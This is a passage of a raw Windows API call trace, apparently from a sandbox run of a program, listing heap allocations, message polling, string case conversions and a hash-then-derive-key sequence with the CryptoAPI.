hHeap=0x25c0000) returned 1 [0160.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0160.700] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0160.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0160.701] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.701] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.701] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.701] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0160.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0160.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.703] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.703] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.703] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.703] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.703] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.704] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.704] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.704] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.704] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.704] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.704] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.704] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.704] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.705] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.705] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0160.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.705] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0160.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.705] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0160.705] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.705] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.705] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.706] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0160.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.706] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.706] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.706] CryptHashData (hHash=0xaa56a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0160.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.706] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.706] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.707] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0160.707] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.707] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0160.707] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.707] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0160.707] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.707] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa56a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.711] HeapFree (in: 